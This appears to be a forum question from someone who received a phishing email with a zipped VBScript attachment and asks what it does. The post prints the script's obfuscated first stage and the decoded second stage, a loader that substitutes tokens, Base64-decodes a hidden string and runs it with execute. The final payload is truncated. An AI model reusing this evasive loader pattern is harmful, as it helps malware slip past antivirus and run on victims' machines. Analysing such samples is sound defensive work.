I received an email which I believe may have been a targeted phishing attack. There was a link to a .zip with a .vbs.
I'm not knowledgeable about vbs but it would appear it starts with a string, does manipulations to it, and then executes an external command (probably to avoid detection).
The first 2 lines are too long to put into this question, but here is a snippet:
qhka = "T24~015~ZXJ~006~b3I~015~cmV~020~~013~W1~019~IG5~019~~003~HQNC~018~R~010~bSB~009~b3N0KDE~010..."
q = Array(0,0,0,0,0,0,0,0,0,...1,...0)
then further down
cryptedLength = 2366
Dim crypted
for index = 1 to cryptedLength
if (q(index) = 2) then crypted = crypted&"Q"
at the end
next
execute(crypted)
Any explanation as to what this does? VirusTotal didn't detect anything. Is this a virus? Is the code written this way to avoid detection?
EDIT: the value of crypted is:
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue =Stream_StringToBinary(sText)
Base64Encode = oNode.text
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Stream_StringToBinary(Text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText Text
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
Set BinaryStream = Nothing
End Function
qhka = Replace(qhka, "~001~","q")
qhka = Replace(qhka, "~002~","w")
qhka = Replace(qhka, "~003~","e")
qhka = Replace(qhka, "~004~","r")
qhka = Replace(qhka, "~005~","t")
qhka = Replace(qhka, "~006~","y")
qhka = Replace(qhka, "~007~","u")
qhka = Replace(qhka, "~008~","i")
qhka = Replace(qhka, "~009~","o")
qhka = Replace(qhka, "~010~","p")
qhka = Replace(qhka, "~011~","a")
qhka = Replace(qhka, "~012~","s")
qhka = Replace(qhka, "~013~","d")
qhka = Replace(qhka, "~014~","f")
qhka = Replace(qhka, "~015~","g")
qhka = Replace(qhka, "~016~","h")
qhka = Replace(qhka, "~017~","j")
qhka = Replace(qhka, "~018~","k")
qhka = Replace(qhka, "~019~","l")
qhka = Replace(qhka, "~020~","z")
qhka = Replace(qhka, "~021~",Chr(10))
qhka = Replace(qhka, "~022~",Chr(13))
execute Base64Decode(Base64Encode(Base64Decode(qhka)))